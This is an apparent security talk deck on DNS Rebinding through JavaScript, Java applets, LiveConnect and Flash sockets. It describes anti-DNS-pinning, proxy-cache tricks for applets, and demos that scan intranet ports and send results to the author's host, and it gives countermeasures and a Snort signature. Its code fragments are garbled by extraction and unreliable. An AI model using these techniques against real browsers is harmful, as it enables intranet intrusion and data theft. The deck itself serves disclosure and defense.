DNS Rebinding and Socket API

1
DNS Rebinding and Socket API Kanatoko erz.net http//www.jumperz.net/
2
DNS Rebinding Overview(1)

• One of the attack vectors
• Not a bug of a certain software
• All kinds of Operating Systems may be affected
• Windows, Linux, MacOSX
• There are no patches
• Occurs in the relationship with Web servers, DNS
  servers, proxy servers
• Real threat
• Maybe your system is vulnerable

3
DNS Rebinding Overview(2)

• Eve controls the web browser of Alice
• and make it do something
• Stealing information
• Make Alice attack
• Not a direct attack against the servers
• Not an attack against the DNS servers

4
How the attack is deployed?

• Deployed when Alice visits Eves trap page
• Same as XSS, CSRF
• Unawares
• Social engineering with using E-mails, BBS,
  comments on blogs
• It is difficult to find out whether the page is a
  trap or not
• Sometimes the hacked web sites ( like famous
  companies) are used to deploy the attack

5
Technologies used in DNS Rebinding

• JavaScript
• Java
• FLASH
• Malicious codes starts running on the Alices
  browser
• But there are security constraints
• For example Cannot read from or write to the
  local files
• Each of these technologies has a network access
  function

6
When Alice visits Eves page(1)

• Eves malicious code starts running and accesses
  over the network
• JavaScript
• Get resources using XMLHttpRequest,SCRIPT
  tag,IMG tag(HTTP)
• FLASH
• URLLoader(HTTP),
• Socket(TCP)
• Java
• URLConnection(HTTP),
• Socket(TCP)
• DatagramSocket(UDP)

7
When Alice visits Eves page(2)

• Of course there are security constraints on the
  network access functions
• Can access only to the origin host on that Java
  Applets(.class,.zip,.jar), FLASH SWF files, web
  pages are located
• Known as Same Origin Policy

8
DNS Rebinding attack vector(1)

• Eve owns the top level domain eve.tld
• So Eve can control the DNS server of eve.tld
• Eve runs a web server at 218.45.25.5 and
  locates the malicious codes there
• Eve binds 218.45.25.5 as the address of the
  hostname www.eve.tld. Eve sets very short value
  ( for example, 8 seconds ) as a TTL value of the
  DNS record
• Alice tries to access to the Eves trap page
  located at www.eve.tld
• The first name resolution is done by Alice and
  218.45.25.5 is returned from the Eves DNS
  server.
• Alices browser loads the Eve s trap page.
• Soon TTL expires
• At the same time, Eve changes the configuration
  of the DNS server and binds 127.0.0.1 as the
  address of the hostname www.eve.tld

9
DNS Rebinding attack vector(2)

• The Eves malicious code on the Alices browser
  tries to access to www.eve.tld
• The second name resolution is done by Alice. This
  time 127.0.0.1 is returned from the Eves DNS
  server.
• The code accesses to 127.0.0.1
• Though 127.0.0.1 is not an Eves host, the code
  is allowed to access to 127.0.0.1 because the
  hostname is www.eve.tld ( same origin )
• As the example above shows, DNS Rebinding enables
  Eve to access to the addresses like 127.0.0.1
  which of course should not be allowed to access

10
What is DNS Pinning?

• Only FLASH is vulnerable to the DNS Rebinding
  attack vector explained in the previous page
• The other two technologies ( JavaScript and Java
  ) caches the DNS information in their own ways
• TTL does not expire. This behavior violates the
  DNS protocol
• It is called as DNS Pinning
• Sun Microsystems implements DNS Pinning on Java
  as a countermeasure to DNS Rebinding ( or DNS
  Spoofing ).
• On the other hand, the browser vendors(
  Microsoft, Mozilla.org and Opera ) seem that they
  are not so conscious of DNS Rebinding
• Eve needs to make Alice discard the cached DNS
  information to execute DNS Rebinding

11
What is Anti-DNS Pinning(1)

• Make Alice discard the pinned DNS information
• Can be applied only to JavaScript
• FLASH does not pin DNS at all
• Java never discards the pinned DNS information.
  Java is immune to Anti-DNS Pinning
• Martin Johns notified this issue to the security
  community at Aug 2006
• http//shampoo.antville.org/stories/1451301/

12
What is Anti-DNS Pinning(2)

• If an access to the server fails after an
  appropriate period has elapsed, the browser
  discards the pinned DNS information and executes
  the second name resolution
• Change the firewall rule
• Shut down the web server
• Make Alice access to the closed port
• (for example- http//example.com81/)
• Anti-DNS Pinning make Eve possible to force Alice
  execute the second name resolution. Eve can
  launch DNS Rebinding as a result
• Anti-DNS Pinning is a step used in DNS Rebinding
  (against JavaScript)

13
DNS Rebinding against JavaScript

• XMLHttpRequest is mainly used
• Get information from the web servers to those Eve
  cannot access without DNS Rebinding, and send it
  to the Eves host
• The targets are only web servers because HTTP is
  used in the communication
• It is not Cross Domain but Cross Address. So
  the HTTP requests do not contain Cookies and
  Authorization headers of the target web page
• For this reason it is not used in CSRF.
• For the same reason it means almost nothing to
  force Alice to get information from the Internet.
  So the Intranet is the main target
• There are some exceptions. If an address-based
  authentication ( for example The countermeasure
  of Universal PDF XSS issue) exists, Eve may use
  DNS Rebinding for get information via the Alices
  browser
• Stolen information is sent to the Eves another
  host. It is quite easy for Eve because there are
  no Same Origin Policy about sending data with
  JavaScript

14
DemoDNS Rebinding on JavaScript

• http//www.jumperz.net/index.php?i2a1b7
• Get information from the Intranet and send it to
  www.jumperz.net
• I was skeptical about whether DNS Rebinding is a
  real threat, when I read the Martins article for
  the first time
• It took me 20 hours to make this demo to work
  stably
• Web application(JSP), DNS server(djbdns) and
  JavaScript on the browser are used
• Uses closed port method to launch Anti-DNS
  Pinning
• Special Thanks to Kawa from Team Tidori

15
JavaScript on each browser

• On Firefox, the code needs to wait for about 2
  minutes to launch Anti-DNS Pinning
• On IE6 and Opera, the code only needs to wait for
  the TTL value( a few seconds )
• IE7- not checked yet

16
Countermeasures for DNS Rebinding on JavaScript

• Require authentication for HTTP accesses
• Basic authentication is enough
• Disabling JavaScript is perfect
• It is not a threat because easy and good
  countermeasures exist
• Of course the default usernames/passwords ( of
  ADSL routers, for example ) need to be changed

17
DNS Rebinding on FLASH and Java(1)

• Socket APIs available
• The Eves code can implement any TCP based
  protocol
• It is far more dangerous than DNS Rebinding on
  JavaScript
• To any hosts on the Internet and the Intranet
• With Any TCP based protocol
• From Alices browser
• Portscan
• SPAM e-mails
• Exploiting known vulnerabilities
• File sharing network
• DoS attacks
• Exploiting address based authentications

18
DNS Rebinding on FLASH and Java(2)

• Eve can use the Alices browser as a TCP( or UDP
  ) proxy because the Eves malicious code can send
  and receive data in anytime using another host
  like www2.eve.tld even on a DNS rebound
  situation
• The Alices system ( or network ) could be both a
  victim and an assailant

19
DNS Rebinding on Java(1)

• Suns Java Virtual Machine
• The code runs under a security restriction called
  Sandbox
• The host that is allowed to communicate over the
  network with Java applet is the origin of the
  applet. It is not the origin of the web page
• The Socket class(TCP) and the DatagramSocket(UDP)
  class are available
• Binary data can be sent and received
• Caches the DNS record until the termination of
  the process ( forever ). It is a very strong DNS
  Pinning
• Apparently violates the DNS protocol. It makes
  trouble when you implement some server
  applications like SMTP server with using Java
• The JVM parameter networkaddress.cache.ttl
  enables you to control this behavior. But still
  in this case the TTL value of the DNS record is
  ignored
• The networkaddress.cache.ttl parameter cannot
  be set from the Java applet

20
DNS Rebinding on Java(2)

• There was a related issue
• http//www.cs.princeton.edu/sip/news/sun-02-22-96
  .html
• There are no configurations like Disable sockets
  on the Java applets
• We cannot remove the Socket class from Java
  because it is also used in the download process
  of the applet
• Java downloads the applet by itself. Not relies
  on the browser
• So the cache of the browser is not used when the
  applet is downloaded by Java
• Java does name resolution for downloading
• The point is that the Java does name resolution
  BEFORE the applet has downloaded
• And the result of the name resolution will be
  cached forever

21
DNS Rebinding on Java(3)

• If the Eves DNS server returns the fake IP
  address as a result of the Alices name
  resolution, the Java applet will not be
  downloaded and the attack will fail
• If the Eves DNS server returns a correct IP
  address as a result of the Alices name
  resolution, the Java applet will be downloaded
  properly. But Eve cannot rebind the IP address
  because the Alices Java caches the result of the
  first name resolution forever. The attack will
  fail as a result
• In both case the attack will fail
• Only the users behind proxy servers are
  vulnerable
• The business users in the cooperation network
  with the application proxy gateway are vulnerable
  than the home users with NAT

22
DNS Rebinding on Java(4)

• Make the proxy server cache the Java applet
  before Java is activated

//make the proxy cache the applet var foo new
Image() foo.src http//12345.jumperz.net/explo
its/MTCPCApplet.class //wait for the TTL to
expire setTimeout( 'f1()', 1000 12 ) //add
the applet tag to the page function f1() var
base document.getElementById( "base" ) var str
'codebase"http//12345.jumperz.net/exploits/"'
''
'' base.innerHTML str
23
DNS Rebinding on Java(5)

• The downloading of the Java applet is done by the
  proxy server though Java does a name resolution
  and a spoofed IP address is returned. The cache
  of the Java applet in the proxy server is
  returned to the Alices Java, and the Eves
  malicious code starts running successfully

- The request of the browser GET
/exploits/MTCPCApplet.class HTTP/1.0 Accept
/ Referer http//1190066223254.jumperz.net/expl
oits/ap3.jsp?address127.0.0.1 Accept-Language
ja User-Agent Mozilla/4.0 (compatible MSIE 6.0
Windows NT 5.0 .NET CLR 2.0.50727) Host
1190066223254.jumperz.net Cookie
JSESSIONIDC6D04DDABD28F3B0FACE61F9EA70B44A Connec
tion Keep-Alive - The request of the Java
applet GET /exploits/MTCPCApplet.class
HTTP/1.1 User-Agent Mozilla/4.0 (Windows 2000
5.0) Java/1.6.0_02 Host 1190066223254.jumperz.net
Accept text/html, image/gif, image/jpeg,
q.2, / q.2 Cookie JSESSIONIDC6D04DDABD28F3B
0FACE61F9EA70B44A Connection keep-alive
24
Demo DNS Rebinding on Java

• http//www.jumperz.net/index.php?i2a1b10
• Scan some ports and retrieve the banner from the
  server, and send the result to www.jumperz.net
• Works on IE, Firefox, and Opera
• Works only on users behind proxy

25
Countermeasures for DNS Rebinding on Java(1)

• Disabling Java
• Restrict the ports allowed to connect to with
  using personal firewalls ( for example only 80
  and 443 )
• Require authentication for every protocol used on
  the Intranet
• Patch known vulnerabilities
• Use firewall to find and stop the outgoing
  attacks.( for example UDP 53 DoS )
• It is not easy to find the malicious Java code on
  the gateway or IDS or IPS because the Java applet
  class file could be zipped into .zip and .jar
  files

26
Countermeasures for DNS Rebinding on Java(2)

• Setup a JRE only for the Java applets and patch
  the SecurityManager class

public void checkConnect(String host, int port)
if (host null) throw new
NullPointerException("host can't be null")
host "127.0.0.2" if
(!host.startsWith("") host.indexOf('') !
-1) host "" host ""
if (port -1) checkPermission(new
SocketPermission(host,
SecurityConstants.SOCKET_RESOLVE_ACTION))
else checkPermission(new
SocketPermission(host""port,
SecurityConstants.SOCKET_CONNECT_ACTION))

27
DNS Rebinding on LiveConnect

• Works only if both Java and JavaScript are
  enabled
• One can write a Java code in a JavaScript code
• var s new java.net.Socket( "www.jumperz.net",
  25 )
• It is a part of the LiveConnect technology
• Not supported on IE
• Eve can send the malicious Java code to Alice
  before Java is activated
• The users NOT behind proxy are also vulnerable
• On the implementation of LiveConnect of Opera it
  seems that there are some bugs
• Firefox is the most dangerous browser

28
Demo DNS Rebinding on LiveConnect

• http//www.jumperz.net/index.php?i2a1b9
• A collaboration of Martin Johns and me
• http//shampoo.antville.org/stories/1566124/
• Scan some ports and retrieve the banner from the
  server, and send the result to www.jumperz.net
• Works on Firefox and Opera

29
Countermeasures for DNS Rebinding on LiveConnect

• The same as those of Java

30
DNS Rebinding on FLASH(1)

• The Socket class is available from ActionScript
  3.0
• Can communicate with server using TCP layer
  protocol
• Binary data can be sent and received
• Works on Flash Player 9.0 or later
• The host that is allowed to communicate over the
  network with FLASH is the origin of the FLASH
  .swf file. It is not the origin of the web page
• FLASH does not implement DNS Pinning at all
• The DNS information will be discarded after the
  TTL has elapsed
• DNS Rebinding on FLASH is very easy
• It is a threat that FLASH has added the Socket
  class because FLASH is one of the most widely
  used plugins. Many users enable FLASH on their
  browsers
• There are no configurations like Disable sockets
  on FLASH

31
DNS Rebinding on FLASH(2)

• An example code of the Socket class

private var sock1Socket private function
test1()void var sock1Socket new
Socket() sock1.addEventListener( Event.CONNECT,
onConnected ) sock1.connect( www.jumperz.net",
80 ) private function onConnected( eEvent
)void sock1.writeMultiByte( "GET /
HTTP/1.0\r\n\r\n", "ISO-8859-1" )
32
DNS Rebinding on FLASH(3)

• Can connect only to ports over 1024 by default.
  This is a difference between FLASH and Java
• Policy-loading is required to connect to ports
  under 1024. This is done by using a TCP-based
  original protocol
• Policy-loading is done successfully under NAT
• Eve could use port 443 for policy-loading
• Detecting the network traffic of the
  policy-loading with IDS or IPS would have some
  meaning
• An example signature ( Snort )
• alert tcp HOME_NET any - EXTERNAL_NET any
  (msg"FLASH Socket policy-file-request"
  flowto_server,established content"
  request/" nocase )

33
DNS Rebinding on FLASH(4)

• An example code of policy-loading and the traffic

//load policy using port 2 flash.system.Security
.loadPolicyFile( "xmlsocket//www.jumperz.net2"
) from client to server / from server to client version"1.0"? SYSTEM "http//www.macromedia.com/xml/dtds/cross-d
omain-policy.dtd" cess-from domain".jumperz.net" to-ports""
/
34
Demo DNS Rebinding on FLASH

• http//www.jumperz.net/index.php?i2a1b8
• This demo notified the existence of the Socket
  class of FLASH to the security community
• Works on Flash Player 9.0 or later
• Cannot scan ports under 1024 in non-NAT network
  because of the FLASH policy-loading mechanism
• Scan some ports and retrieve the banner from the
  server, and send the result to www.jumperz.net

35
Countermeasures for DNS Rebinding on FLASH(1)

• Disabling FLASH
• The same as those of Java

36
Countermeasures for DNS Rebinding on FLASH(2)

• Patch .dll or .ocx files
• Overwrite the call instruction to the connect
  winsock API
• Almost no side effects ( you still can see
  YouTube )

BEFORE
AFTER
37
Dynamic DNS and DNS Pinning

• At some point an IP address is used by the Bobs
  web server
• Alice visits the Bobs web site
• Bobs connection has lost and he reconnect to the
  Internet, and the IP address of the Bobs server
  has changed
• Soon Bob rebinds the new IP address with the
  Bobs hostname with using some Dynamic DNS system
• Eve gets Bobs old IP address ( bound by ISP,
  with DHCP )
• If Alice has pinned the DNS information of the
  Bobs hostname, the Alices HTTP requests will be
  sent to the Eves web server. Of course those
  should be sent to the Bobs web server
• In this case Eve can get the Alices session id
  from the cookie and can hijack her session
• This will happen to every web sites because every
  service based on DNS is dynamic in long term
• It means that DNS Pinning may cause another
  security problem

38
Countermeasures on all 3 technologies

• Monitoring DNS packets (Is there any good system
  for this purpose ?)
• Change of IP address in a short period
• Especially from global IP to private IP
• It is hard to find DNS Rebinding attacks from the
  TTL values because very short TTL values are
  widely used
• The plugins of Firefox is useful ( NoScript,
  FlashBlock etc)

39
Other things

• DNS Rebinding is a really complicated problem
• Web browsers
• Plugins
• DNS
• Proxies
• Real threat
• We cannot find attacks if it is not prepared to
  find
• Do we need some detection system for DNS
  Rebinding, as a first step?
• We need more flexible configurations on the
  browsers
• Disable/Enable Sockets on Java/FLASH
• IP address has changed notification dialogs

40
Thank you!

• Any questions?